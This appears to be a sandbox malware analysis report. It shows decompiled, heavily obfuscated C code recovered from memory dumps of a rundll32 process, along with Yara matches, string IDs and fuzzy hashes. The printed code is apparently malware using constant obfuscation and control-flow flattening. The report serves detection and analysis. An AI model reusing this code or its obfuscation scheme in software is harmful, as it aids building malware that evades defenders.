                                                                      				_v1768 = 0x28c2;
                                                                      				_v1768 = _v1768 >> 0xd;
                                                                      				_v1768 = _v1768 + 0x2712;
                                                                      				_v1768 = _v1768 ^ 0x07349c13;
                                                                      				_v1768 = _v1768 ^ 0x07349474;
                                                                      				_v1704 = 0x10fc;
                                                                      				_v1704 = _v1704 / _t592;
                                                                      				_v1704 = _v1704 << 3;
                                                                      				_v1704 = _v1704 ^ 0x00004238;
                                                                      				_v1800 = 0x184a;
                                                                      				_v1800 = _v1800 + 0xffff99ad;
                                                                      				_v1800 = _v1800 ^ 0xcc4ae956;
                                                                      				_v1800 = _v1800 + 0xa9c1;
                                                                      				_v1800 = _v1800 ^ 0x33b67127;
                                                                      				_v1744 = 0x179e;
                                                                      				_v1744 = _v1744 + 0xffff74c4;
                                                                      				_v1744 = _v1744 | 0xd516901d;
                                                                      				_v1744 = _v1744 ^ 0x9db0741f;
                                                                      				_v1744 = _v1744 ^ 0x624ff6d2;
                                                                      				_v1752 = 0x9363;
                                                                      				_v1752 = _v1752 | 0xf786f6d1;
                                                                      				_t593 = 0xa;
                                                                      				_v1752 = _v1752 / _t593;
                                                                      				_v1752 = _v1752 >> 5;
                                                                      				_v1752 = _v1752 ^ 0x00c62888;
                                                                      				_v1672 = 0x1bee;
                                                                      				_v1672 = _v1672 + 0x7e36;
                                                                      				_v1672 = _v1672 + 0xffff985d;
                                                                      				_v1672 = _v1672 ^ 0x00003202;
                                                                      				_v1620 = 0x8753;
                                                                      				_t594 = 0x21;
                                                                      				_v1620 = _v1620 * 0x2e;
                                                                      				_v1620 = _v1620 ^ 0x00180c0f;
                                                                      				_v1792 = 0xc17f;
                                                                      				_v1792 = _v1792 >> 2;
                                                                      				_v1792 = _v1792 + 0xffff6cdc;
                                                                      				_v1792 = _v1792 << 1;
                                                                      				_v1792 = _v1792 ^ 0xffff3724;
                                                                      				_v1724 = 0xedd7;
                                                                      				_v1724 = _v1724 + 0xa1ff;
                                                                      				_v1724 = _v1724 + 0xcda9;
                                                                      				_v1724 = _v1724 ^ 0x00024839;
                                                                      				_v1784 = 0xba9c;
                                                                      				_v1784 = _v1784 / _t594;
                                                                      				_v1784 = _v1784 + 0xffff5d38;
                                                                      				_t595 = 0x17;
                                                                      				_v1784 = _v1784 * 0x45;
                                                                      				_v1784 = _v1784 ^ 0xffd5c86c;
                                                                      				_v1736 = 0x93;
                                                                      				_v1736 = _v1736 >> 7;
                                                                      				_v1736 = _v1736 / _t595;
                                                                      				_v1736 = _v1736 ^ 0x00006ab8;
                                                                      				_v1628 = 0x276d;
                                                                      				_t596 = 0x68;
                                                                      				_v1628 = _v1628 / _t596;
                                                                      				_v1628 = _v1628 ^ 0x00000861;
                                                                      				_v1728 = 0x2eb2;
                                                                      				_t597 = 0x4f;
                                                                      				_v1728 = _v1728 / _t597;
                                                                      				_v1728 = _v1728 + 0x5604;
                                                                      				_v1728 = _v1728 ^ 0x00004423;
                                                                      				_v1732 = 0x27f2;
                                                                      				_v1732 = _v1732 ^ 0x3ac346ca;
                                                                      				_v1732 = _v1732 >> 2;
                                                                      				_v1732 = _v1732 ^ 0x0eb0faa5;
                                                                      				_v1664 = 0xcef2;
                                                                      				_v1664 = _v1664 + 0xfffff6e2;
                                                                      				_v1664 = _v1664 ^ 0x0000a230;
                                                                      				_v1632 = 0x1d36;
                                                                      				_v1632 = _v1632 >> 4;
                                                                      				_v1632 = _v1632 ^ 0x00002ec0;
                                                                      				_v1644 = 0x1ff5;
                                                                      				_v1644 = _v1644 << 5;
                                                                      				_v1644 = _v1644 ^ 0x0003b8ff;
                                                                      				_v1776 = 0x2b67;
                                                                      				_t598 = 0x44;
                                                                      				_v1776 = _v1776 * 0x26;
                                                                      				_v1776 = _v1776 >> 1;
                                                                      				_v1776 = _v1776 << 9;
                                                                      				_v1776 = _v1776 ^ 0x067150e1;
                                                                      				_v1748 = 0x6691;
                                                                      				_v1748 = _v1748 + 0xffff6f52;
                                                                      				_v1748 = _v1748 + 0xfffff72c;
                                                                      				_v1748 = _v1748 + 0x945b;
                                                                      				_v1748 = _v1748 ^ 0x00005e83;
                                                                      				_v1660 = 0xb6a0;
                                                                      				_v1660 = _v1660 + 0x5077;
                                                                      				_v1660 = _v1660 ^ 0x00013d7f;
                                                                      				_v1680 = 0x9a0c;
                                                                      				_v1680 = _v1680 + 0x1ba;
                                                                      				_v1680 = _v1680 << 9;
                                                                      				_v1680 = _v1680 ^ 0x0137abe4;
                                                                      				_v1720 = 0x9003;
                                                                      				_v1720 = _v1720 ^ 0xe8061da0;
                                                                      				_v1720 = _v1720 >> 0xe;
                                                                      				_v1720 = _v1720 ^ 0x0003e70e;
                                                                      				_v1696 = 0x225f;
                                                                      				_v1696 = _v1696 + 0xffff757f;
                                                                      				_v1696 = _v1696 | 0x5384c054;
                                                                      				_v1696 = _v1696 ^ 0xffff974f;
                                                                      				_v1816 = 0xbb4b;
                                                                      				_v1816 = _v1816 * 0x5d;
                                                                      				_v1816 = _v1816 / _t598;
                                                                      				_v1816 = _v1816 >> 3;
                                                                      				_v1816 = _v1816 ^ 0x00005120;
                                                                      				_v1640 = 0x4988;
                                                                      				_v1640 = _v1640 | 0xfa9f0bea;
                                                                      				_v1640 = _v1640 ^ 0xfa9f78d4;
                                                                      				_v1648 = 0x6a0a;
                                                                      				_v1648 = _v1648 << 9;
                                                                      				_v1648 = _v1648 ^ 0x00d43e74;
                                                                      				_v1684 = 0x375;
                                                                      				_v1684 = _v1684 * 0x2b;
                                                                      				_v1684 = _v1684 << 7;
                                                                      				_v1684 = _v1684 ^ 0x005a5380;
                                                                      				_t552 = E02000186();
                                                                      				_t588 = _v1604;
                                                                      				_t654 = _t552;
                                                                      				_t648 = _v1604;
                                                                      				while(1) {
                                                                      					L1:
                                                                      					_t553 = 0x2a6416b7;
                                                                      					do {
                                                                      						while(1) {
                                                                      							L2:
                                                                      							_t658 = _t649 - _t553;
                                                                      							if(_t658 > 0) {
                                                                      								break;
                                                                      							}
                                                                      							if(_t658 == 0) {
                                                                      								_push(0x1ff1070);
                                                                      								_push(_v1744);
                                                                      								_push(_v1800);
                                                                      								E0200BAEC(0x104, __eflags, _v1672, E01FF5DFC(_v1768, _v1704, __eflags),  &_v1564, _v1620, _v1792,  &_v1044, _t588,  &_v524);
                                                                      								E02000D6D(_v1724, _v1784, _v1736, _t573);
                                                                      								_t655 = _t655 + 0x34;
                                                                      								_t649 = 0x269ce6ac;
                                                                      								while(1) {
                                                                      									L1:
                                                                      									_t553 = 0x2a6416b7;
                                                                      									goto L2;
                                                                      								}
                                                                      							} else {
                                                                      								if(_t649 == 0x64fcc40) {
                                                                      									_t579 = E0200135B(_v1688, _v1808, _v1592, _v1596, _v1712);
                                                                      									_t588 = _t579;
                                                                      									_t655 = _t655 + 0xc;
                                                                      									__eflags = _t579;
                                                                      									_t553 = 0x2a6416b7;
                                                                      									_t649 =  !=  ? 0x2a6416b7 : 0x30528e15;
                                                                      									continue;
                                                                      								} else {
                                                                      									if(_t649 == 0x16d63096) {
                                                                      										return E01FFDE81(_v1640, _t648, _v1648);
                                                                      									}
                                                                      									if(_t649 == 0x1795f4ce) {
                                                                      										E01FFDE81(_v1644, _t588, _v1776);
                                                                      										_t649 = 0x30528e15;
                                                                      										while(1) {
                                                                      											L1:
                                                                      											_t553 = 0x2a6416b7;
                                                                      											goto L2;
                                                                      										}
                                                                      									} else {
                                                                      										if(_t649 == 0x1c05f6e2) {
                                                                      											_push( &_v1564);
                                                                      											_push(0x1ff1000);
                                                                      											E0200B165(_v1600, _v1604);
                                                                      											asm("sbb esi, esi");
                                                                      											_t651 = _t649 & 0x21272103;
                                                                      											__eflags = _t651;
                                                                      											L13:
                                                                      											_t649 = _t651 + 0x16d63096;
                                                                      											while(1) {
                                                                      												L1:
                                                                      												_t553 = 0x2a6416b7;
                                                                      												goto L2;
                                                                      											}
                                                                      										} else {
                                                                      											if(_t649 == 0x1ef0e1ab) {
                                                                      												E01FFF1ED(_v1680, _v1720, _v1696, _v1816, _v1588);
                                                                      												_t655 = _t655 + 0xc;
                                                                      												_t649 = 0x2b2354e1;
                                                                      												while(1) {
                                                                      													L1:
                                                                      													_t553 = 0x2a6416b7;
                                                                      													goto L2;
                                                                      												}
                                                                      											} else {
                                                                      												_t664 = _t649 - 0x269ce6ac;
                                                                      												if(_t649 != 0x269ce6ac) {
                                                                      													goto L28;
                                                                      												} else {
                                                                      													_push(1);
                                                                      													_push( &_v1044);
                                                                      													_push(_v1632);
                                                                      													_push(_v1664);
                                                                      													_push(_v1732);
                                                                      													_push(_v1728);
                                                                      													_push(0);
                                                                      													_push(0);
                                                                      													E01FF6417(_v1628, _t664);
                                                                      													_t655 = _t655 + 0x20;
                                                                      													_t649 = 0x1795f4ce;
                                                                      													while(1) {
                                                                      														L1:
                                                                      														_t553 = 0x2a6416b7;
                                                                      														goto L2;
                                                                      													}
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      							L18:
                                                                      							__eflags = _t649 - 0x2bf7e78d;
                                                                      							if(_t649 == 0x2bf7e78d) {
                                                                      								E01FF57D4(_v1668,  &_v1596, _v1676, _v1656,  &_v1588);
                                                                      								_t655 = _t655 + 0x10;
                                                                      								asm("sbb esi, esi");
                                                                      								_t649 = (_t649 & 0xe75eea95) + 0x1ef0e1ab;
                                                                      								while(1) {
                                                                      									L1:
                                                                      									_t553 = 0x2a6416b7;
                                                                      									goto L2;
                                                                      								}
                                                                      							}
                                                                      							__eflags = _t649 - 0x30528e15;
                                                                      							if(_t649 == 0x30528e15) {
                                                                      								E01FFDE81(_v1748, _v1596, _v1660);
                                                                      								_pop(_t613);
                                                                      								_t649 = 0x1ef0e1ab;
                                                                      								while(1) {
                                                                      									L1:
                                                                      									_t553 = 0x2a6416b7;
                                                                      									goto L2;
                                                                      								}
                                                                      							}
                                                                      							__eflags = _t649 - 0x37fd5199;
                                                                      							if(_t649 == 0x37fd5199) {
                                                                      								_v1584 = E02003587();
                                                                      								_t564 = E0200232B(_v1788, _t563, _v1796);
                                                                      								_pop(_t615);
                                                                      								_v1580 = 2 + _t564 * 2;
                                                                      								_t613 =  &_v1588;
                                                                      								E01FF446D(_t613, _v1756, _t615, _v1764, _v1772, _t654, _t654, _v1684, _v1616, _v1780, _t654, _v1692, _v1624);
                                                                      								_t655 = _t655 + 0x30;
                                                                      								asm("sbb esi, esi");
                                                                      								_t651 = _t649 & 0x1521b6f7;
                                                                      								goto L13;
                                                                      							}
                                                                      							__eflags = _t649 - 0x3869a6dc;
                                                                      							if(_t649 != 0x3869a6dc) {
                                                                      								goto L28;
                                                                      							}
                                                                      							_t647 = 0x50;
                                                                      							_t570 = E01FF54FB(_t647);
                                                                      							_t648 = _t570;
                                                                      							_t613 = _t613;
                                                                      							__eflags = _t648;
                                                                      							if(_t648 != 0) {
                                                                      								_push(_t613);
                                                                      								E01FF471A(_v1608,  &_v524, _v1812, _v1700, _v1708, _v1820, _v1716);
                                                                      								_t655 = _t655 + 0x20;
                                                                      								_t649 = 0x1c05f6e2;
                                                                      								goto L1;
                                                                      							}
                                                                      							return _t570;
                                                                      						}
                                                                      						__eflags = _t649 - 0x2b2354e1;
                                                                      						if(_t649 == 0x2b2354e1) {
                                                                      							_t649 = 0x1392add6;
                                                                      							 *((intOrPtr*)(_t648 + 0x44)) = _v1600;
                                                                      							 *_t648 =  *0x2011084;
                                                                      							_t553 = 0x2a6416b7;
                                                                      							 *0x2011084 = _t648;
                                                                      							goto L28;
                                                                      						}
                                                                      						goto L18;
                                                                      						L28:
                                                                      						__eflags = _t649 - 0x1392add6;
                                                                      					} while (__eflags != 0);
                                                                      					return _t553;
                                                                      				}
                                                                      			}
                                                                      0x01ffb8ce
                                                                      0x01ffb8d5
                                                                      0x01ffb8da
                                                                      0x01ffb8f5
                                                                      0x01ffb91c
                                                                      0x01ffb923
                                                                      0x01ffb928
                                                                      0x01ffb92d
                                                                      0x01ffb92f
                                                                      0x00000000
                                                                      0x01ffb92f
                                                                      0x01ffb84a
                                                                      0x01ffb850
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01ffb864
                                                                      0x01ffb865
                                                                      0x01ffb86a
                                                                      0x01ffb86c
                                                                      0x01ffb86d
                                                                      0x01ffb86f
                                                                      0x01ffb875
                                                                      0x01ffb8a2
                                                                      0x01ffb8a7
                                                                      0x01ffb8aa
                                                                      0x00000000
                                                                      0x01ffb8aa
                                                                      0x01ffb9f1
                                                                      0x01ffb9f1
                                                                      0x01ffb81e
                                                                      0x01ffb824
                                                                      0x01ffb9a9
                                                                      0x01ffb9ae
                                                                      0x01ffb9b6
                                                                      0x01ffb9b8
                                                                      0x01ffb9bd
                                                                      0x00000000
                                                                      0x01ffb9bd
                                                                      0x00000000
                                                                      0x01ffb9c3
                                                                      0x01ffb9c3
                                                                      0x01ffb9c3
                                                                      0x00000000
                                                                      0x01ffb644

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: j$ Q$#D$)7$.hk)$6~$8B$A1$De$Uk$_"$g+$m'$o>$ot$wP$~v$T#+$T#+
                                                                      • API String ID: 0-2608984025
                                                                      • Opcode ID: 8cc87445c23d422a81aeb0ea8d93698663441bbee156be5339290357e261575c
                                                                      • Instruction ID: 7656163aa81d02531d878908d838161c4e23cc582830f9c5c4143039f5a51dca
                                                                      • Opcode Fuzzy Hash: 8cc87445c23d422a81aeb0ea8d93698663441bbee156be5339290357e261575c
                                                                      • Instruction Fuzzy Hash: 3E52047290C3818FE374CF24C549B9BBBE1BB94718F108A1DE6D9962A0D7B58949CF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: j$ Q$#D$)7$.hk)$6~$8B$A1$De$Uk$_"$g+$m'$o>$ot$wP$~v$T#+$T#+
                                                                      • API String ID: 0-2608984025
                                                                      • Opcode ID: 963a99a93fb689d0f71fdebccc791c46f5cda195b7edc031de167631b906f063
                                                                      • Instruction ID: ba8830ef5c8373d15caca380ba80653aa4f36d96765f27482b7c81f2544ea9f9
                                                                      • Opcode Fuzzy Hash: 963a99a93fb689d0f71fdebccc791c46f5cda195b7edc031de167631b906f063
                                                                      • Instruction Fuzzy Hash: B95212B150D3818FE378CF24C949B9BBBE1BB94308F108A1DE5D9962A0D7B58959CF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 6$%8$-[$9;$I&F$T5$W>$[(%$_u$a$g%$l#$+$mnf$tz$wK$p
                                                                      • API String ID: 0-3673879503
                                                                      • Opcode ID: 9fd079df365c0b38c3b7971676b147244cc8a405241a52ec73158a79eff0d458
                                                                      • Instruction ID: a0b7a226c9314d94c73bcdf86a066b50a9070753deace6b560e1ff93e78d44df
                                                                      • Opcode Fuzzy Hash: 9fd079df365c0b38c3b7971676b147244cc8a405241a52ec73158a79eff0d458
                                                                      • Instruction Fuzzy Hash: 411211B1508381DFE368CF65C48AA4BFBE1BBC5758F10891DE1D9862A0D7B98958CF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 94%
                                                                      			E02007BBE(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, intOrPtr* _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                      				intOrPtr* _v4;
                                                                      				intOrPtr _v8;
                                                                      				char _v12;
                                                                      				intOrPtr _v16;
                                                                      				char _v20;
                                                                      				intOrPtr _v24;
                                                                      				intOrPtr* _v28;
                                                                      				signed int _v32;
                                                                      				signed int _v36;
                                                                      				signed int _v40;
                                                                      				signed int _v44;
                                                                      				signed int _v48;
                                                                      				signed int _v52;
                                                                      				signed int _v56;
                                                                      				signed int _v60;
                                                                      				signed int _v64;
                                                                      				signed int _v68;
                                                                      				signed int _v72;
                                                                      				signed int _v76;
                                                                      				signed int _v80;
                                                                      				signed int _v84;
                                                                      				signed int _v88;
                                                                      				unsigned int _v92;
                                                                      				signed int _v96;
                                                                      				signed int _v100;
                                                                      				signed int _v104;
                                                                      				signed int _v108;
                                                                      				signed int _v112;
                                                                      				signed int _v116;
                                                                      				signed int _v120;
                                                                      				signed int _v124;
                                                                      				signed int _v128;
                                                                      				signed int _v132;
                                                                      				signed int _v136;
                                                                      				signed int _v140;
                                                                      				signed int _v144;
                                                                      				signed int _v148;
                                                                      				signed int _v152;
                                                                      				signed int _v156;
                                                                      				signed int _v160;
                                                                      				signed int _v164;
                                                                      				signed int _v168;
                                                                      				signed int _v172;
                                                                      				signed int _v176;
                                                                      				signed int _v180;
                                                                      				signed int _v184;
                                                                      				signed int _v188;
                                                                      				signed int _v192;
                                                                      				signed int _v196;
                                                                      				signed int _v200;
                                                                      				signed int _v204;
                                                                      				signed int _v208;
                                                                      				signed int _v212;
                                                                      				signed int _v216;
                                                                      				signed int _v220;
                                                                      				signed int _v224;
                                                                      				signed int _v228;
                                                                      				signed int _v232;
                                                                      				signed int _v236;
                                                                      				signed int _v240;
                                                                      				signed int _v244;
                                                                      				signed int _v248;
                                                                      				signed int _v252;
                                                                      				signed int _v256;
                                                                      				signed int _v260;
                                                                      				signed int _v264;
                                                                      				signed int _v268;
                                                                      				signed int _v272;
                                                                      				signed int _v276;
                                                                      				signed int _v280;
                                                                      				intOrPtr* _v284;
                                                                      				intOrPtr* _v288;
                                                                      				void* __ecx;
                                                                      				intOrPtr* _t702;
                                                                      				intOrPtr* _t706;
                                                                      				intOrPtr* _t709;
                                                                      				intOrPtr* _t714;
                                                                      				intOrPtr* _t716;
                                                                      				intOrPtr _t718;
                                                                      				void* _t720;
                                                                      				intOrPtr _t734;
                                                                      				intOrPtr _t738;
                                                                      				intOrPtr _t739;
                                                                      				intOrPtr* _t740;
                                                                      				intOrPtr _t750;
                                                                      				void* _t764;
                                                                      				void* _t815;
                                                                      				signed int _t832;
                                                                      				signed int _t833;
                                                                      				signed int _t834;
                                                                      				signed int _t835;
                                                                      				signed int _t836;
                                                                      				signed int _t837;
                                                                      				signed int _t838;
                                                                      				signed int _t839;
                                                                      				signed int _t840;
                                                                      				signed int _t841;
                                                                      				signed int _t842;
                                                                      				signed int _t843;
                                                                      				signed int _t844;
                                                                      				signed int _t845;
                                                                      				signed int _t846;
                                                                      				signed int _t847;
                                                                      				signed int _t848;
                                                                      				signed int _t849;
                                                                      				signed int _t850;
                                                                      				signed int _t851;
                                                                      				signed int _t852;
                                                                      				signed int _t853;
                                                                      				signed int _t855;
                                                                      				intOrPtr* _t861;
                                                                      				void* _t863;
                                                                      				void* _t865;
                                                                      
                                                                      				_t740 = _a20;
                                                                      				_push(_a40);
                                                                      				_push(_a36);
                                                                      				_v16 = __edx;
                                                                      				_push(_a32);
                                                                      				_push(_a28);
                                                                      				_push(_a24);
                                                                      				_push(_t740);
                                                                      				_push(_a16 & 0x0000ffff);
                                                                      				_push(_a12);
                                                                      				_push(_a8);
                                                                      				_push(_a4);
                                                                      				_push(__edx);
                                                                      				E02002550(_a16 & 0x0000ffff);
                                                                      				_v8 = 0x36204f;
                                                                      				_v20 = 0;
                                                                      				_t863 =  &_v288 + 0x30;
                                                                      				_v4 = 0;
                                                                      				_v272 = 0xdc69;
                                                                      				_t861 = 0;
                                                                      				_v272 = _v272 + 0xffff6337;
                                                                      				_v272 = _v272 + 0xffff179b;
                                                                      				_t855 = 0x175d2af;
                                                                      				_v272 = _v272 << 0xa;
                                                                      				_v272 = _v272 ^ 0xfd5cec00;
                                                                      				_v204 = 0xa9cd;
                                                                      				_v204 = _v204 + 0xe741;
                                                                      				_v204 = _v204 << 0xa;
                                                                      				_v28 = 0;
                                                                      				_t832 = 0x3a;
                                                                      				_v204 = _v204 / _t832;
                                                                      				_v204 = _v204 ^ 0x001ba8a3;
                                                                      				_v260 = 0x5d6b;
                                                                      				_t833 = 0x6f;
                                                                      				_v260 = _v260 / _t833;
                                                                      				_t834 = 0x1e;
                                                                      				_v288 = 0;
                                                                      				_v260 = _v260 * 0x73;
                                                                      				_v260 = _v260 * 0x64;
                                                                      				_v260 = _v260 ^ 0x0025bafc;
                                                                      				_v116 = 0x8d70;
                                                                      				_v116 = _v116 * 0x63;
                                                                      				_v116 = _v116 ^ 0x00363250;
                                                                      				_v132 = 0x5ee0;
                                                                      				_v132 = _v132 << 6;
                                                                      				_v132 = _v132 / _t834;
                                                                      				_v132 = _v132 ^ 0x00008a66;
                                                                      				_v172 = 0xa39a;
                                                                      				_t835 = 0xa;
                                                                      				_v172 = _v172 / _t835;
                                                                      				_v172 = _v172 << 8;
                                                                      				_v172 = _v172 ^ 0x00505c00;
                                                                      				_v148 = 0xec35;
                                                                      				_v148 = _v148 >> 0xc;
                                                                      				_v148 = _v148 << 6;
                                                                      				_v148 = _v148 ^ 0x00040380;
                                                                      				_v180 = 0xfe27;
                                                                      				_v180 = _v180 >> 0xe;
                                                                      				_v180 = _v180 >> 0xb;
                                                                      				_v180 = _v180 ^ 0x04000000;
                                                                      				_v124 = 0x1d9b;
                                                                      				_v124 = _v124 >> 2;
                                                                      				_v124 = _v124 + 0xe7fe;
                                                                      				_v124 = _v124 ^ 0x0008ef64;
                                                                      				_v100 = 0x81fc;
                                                                      				_v100 = _v100 >> 6;
                                                                      				_v100 = _v100 ^ 0x00000007;
                                                                      				_v188 = 0xe2f5;
                                                                      				_v188 = _v188 ^ 0x71f5675a;
                                                                      				_v188 = _v188 | 0xaa328868;
                                                                      				_v188 = _v188 ^ 0xfbf78cef;
                                                                      				_v176 = 0x473a;
                                                                      				_v176 = _v176 >> 0xf;
                                                                      				_t836 = 0x33;
                                                                      				_v176 = _v176 / _t836;
                                                                      				_v176 = _v176 ^ 0x80000000;
                                                                      				_v80 = 0xf23d;
                                                                      				_v80 = _v80 + 0xffff33d4;
                                                                      				_v80 = _v80 ^ 0x00002611;
                                                                      				_v156 = 0xc473;
                                                                      				_v156 = _v156 >> 0xc;
                                                                      				_t837 = 0x65;
                                                                      				_v156 = _v156 * 0x12;
                                                                      				_v156 = _v156 ^ 0x000000db;
                                                                      				_v112 = 0xf10b;
                                                                      				_v112 = _v112 / _t837;
                                                                      				_v112 = _v112 ^ 0x000006ec;
                                                                      				_v60 = 0xdfe2;
                                                                      				_v60 = _v60 ^ 0xa11a41e5;
                                                                      				_v60 = _v60 ^ 0xa11ac0c1;
                                                                      				_v184 = 0xb35b;
                                                                      				_v184 = _v184 + 0xffff738c;
                                                                      				_v184 = _v184 + 0xaea7;
                                                                      				_v184 = _v184 ^ 0x0000b6b5;
                                                                      				_v104 = 0xd6d;
                                                                      				_v104 = _v104 | 0x69c9fc48;
                                                                      				_v104 = _v104 ^ 0x69c98054;
                                                                      				_v280 = 0x128c;
                                                                      				_v280 = _v280 | 0x3ab331cb;
                                                                      				_v280 = _v280 << 0xd;
                                                                      				_t838 = 0x6e;
                                                                      				_v280 = _v280 / _t838;
                                                                      				_v280 = _v280 ^ 0x00ee7109;
                                                                      				_v192 = 0x915d;
                                                                      				_v192 = _v192 << 3;
                                                                      				_v192 = _v192 ^ 0x4be63910;
                                                                      				_v192 = _v192 ^ 0x4be2c2bd;
                                                                      				_v256 = 0x1d7e;
                                                                      				_v256 = _v256 << 0xc;
                                                                      				_v256 = _v256 + 0x423a;
                                                                      				_v256 = _v256 >> 2;
                                                                      				_v256 = _v256 ^ 0x00763d31;
                                                                      				_v264 = 0xd93b;
                                                                      				_v264 = _v264 >> 0x10;
                                                                      				_v264 = _v264 + 0xbaa;
                                                                      				_v264 = _v264 * 0x53;
                                                                      				_v264 = _v264 ^ 0x0003caf0;
                                                                      				_v276 = 0x45bb;
                                                                      				_v276 = _v276 >> 0xe;
                                                                      				_t839 = 0x52;
                                                                      				_v276 = _v276 / _t839;
                                                                      				_v276 = _v276 | 0xacdb8348;
                                                                      				_v276 = _v276 ^ 0xacdbabf1;
                                                                      				_v168 = 0x21d1;
                                                                      				_t840 = 0x5f;
                                                                      				_v168 = _v168 * 0x6c;
                                                                      				_v168 = _v168 | 0xdafc5a22;
                                                                      				_v168 = _v168 ^ 0xdafe2196;
                                                                      				_v196 = 0xddc4;
                                                                      				_v196 = _v196 >> 7;
                                                                      				_v196 = _v196 / _t840;
                                                                      				_v196 = _v196 ^ 0x00004407;
                                                                      				_v72 = 0x5faa;
                                                                      				_t841 = 0x19;
                                                                      				_v72 = _v72 * 0x1f;
                                                                      				_v72 = _v72 ^ 0x000beafb;
                                                                      				_v144 = 0x94da;
                                                                      				_v144 = _v144 | 0xc2399f35;
                                                                      				_v144 = _v144 ^ 0x39a01d15;
                                                                      				_v144 = _v144 ^ 0xfb99dd4a;
                                                                      				_v152 = 0xccbe;
                                                                      				_v152 = _v152 | 0x7027dc53;
                                                                      				_v152 = _v152 ^ 0xf82ab60d;
                                                                      				_v152 = _v152 ^ 0x880d3695;
                                                                      				_v224 = 0xbc89;
                                                                      				_v224 = _v224 + 0x37f5;
                                                                      				_v224 = _v224 << 4;
                                                                      				_v224 = _v224 + 0xba4c;
                                                                      				_v224 = _v224 ^ 0x00103e7c;
                                                                      				_v88 = 0x13fb;
                                                                      				_v88 = _v88 / _t841;
                                                                      				_v88 = _v88 ^ 0x0000146e;
                                                                      				_v216 = 0x2a85;
                                                                      				_v216 = _v216 >> 0xc;
                                                                      				_v216 = _v216 >> 0xb;
                                                                      				_v216 = _v216 + 0xffff9599;
                                                                      				_v216 = _v216 ^ 0xffffae90;
                                                                      				_v64 = 0x23ad;
                                                                      				_v64 = _v64 + 0x6280;
                                                                      				_v64 = _v64 ^ 0x0000a8ff;
                                                                      				_v244 = 0xad34;
                                                                      				_t842 = 0x78;
                                                                      				_v244 = _v244 / _t842;
                                                                      				_v244 = _v244 | 0x167eb282;
                                                                      				_v244 = _v244 + 0xffff1b5d;
                                                                      				_v244 = _v244 ^ 0x167d9f04;
                                                                      				_v48 = 0xe2d3;
                                                                      				_t843 = 0x44;
                                                                      				_v48 = _v48 / _t843;
                                                                      				_v48 = _v48 ^ 0x00006548;
                                                                      				_v212 = 0x1f13;
                                                                      				_v212 = _v212 | 0x5cd55339;
                                                                      				_v212 = _v212 * 0x69;
                                                                      				_v212 = _v212 << 0xf;
                                                                      				_v212 = _v212 ^ 0x0799ff86;
                                                                      				_v252 = 0x103d;
                                                                      				_t844 = 0x2c;
                                                                      				_v252 = _v252 / _t844;
                                                                      				_v252 = _v252 << 1;
                                                                      				_v252 = _v252 ^ 0x1506d405;
                                                                      				_v252 = _v252 ^ 0x1506fe58;
                                                                      				_v228 = 0xc990;
                                                                      				_v228 = _v228 >> 0x10;
                                                                      				_v228 = _v228 ^ 0xb1dbef51;
                                                                      				_v228 = _v228 + 0xffff081c;
                                                                      				_v228 = _v228 ^ 0xb1dafd56;
                                                                      				_v40 = 0x9a48;
                                                                      				_v40 = _v40 + 0xffff0212;
                                                                      				_v40 = _v40 ^ 0xffffae48;
                                                                      				_v108 = 0x52c;
                                                                      				_v108 = _v108 >> 4;
                                                                      				_v108 = _v108 ^ 0x0000049e;
                                                                      				_v220 = 0x8eda;
                                                                      				_v220 = _v220 | 0x6dde0b3f;
                                                                      				_v220 = _v220 << 0xc;
                                                                      				_v220 = _v220 >> 3;
                                                                      				_v220 = _v220 ^ 0x1d1fa9c0;
                                                                      				_v52 = 0xd0e6;
                                                                      				_v52 = _v52 ^ 0x110e7ea1;
                                                                      				_v52 = _v52 ^ 0x110ecde5;
                                                                      				_v32 = 0xfc2c;
                                                                      				_t845 = 0x76;
                                                                      				_v32 = _v32 / _t845;
                                                                      				_v32 = _v32 ^ 0x000058ce;
                                                                      				_v268 = 0x3002;
                                                                      				_v268 = _v268 ^ 0xd0ce5963;
                                                                      				_v268 = _v268 + 0x23d4;
                                                                      				_v268 = _v268 ^ 0x2e4fc162;
                                                                      				_v268 = _v268 ^ 0xfe811412;
                                                                      				_v236 = 0x3882;
                                                                      				_v236 = _v236 >> 4;
                                                                      				_v236 = _v236 + 0xffff636b;
                                                                      				_v236 = _v236 << 4;
                                                                      				_v236 = _v236 ^ 0xfff66e05;
                                                                      				_v164 = 0x6dca;
                                                                      				_t846 = 0x60;
                                                                      				_v164 = _v164 / _t846;
                                                                      				_v164 = _v164 + 0x77ed;
                                                                      				_v164 = _v164 ^ 0x00001e7b;
                                                                      				_v92 = 0x939d;
                                                                      				_v92 = _v92 >> 0xe;
                                                                      				_v92 = _v92 ^ 0x00001fb9;
                                                                      				_v76 = 0xa6db;
                                                                      				_t847 = 9;
                                                                      				_v76 = _v76 * 0x46;
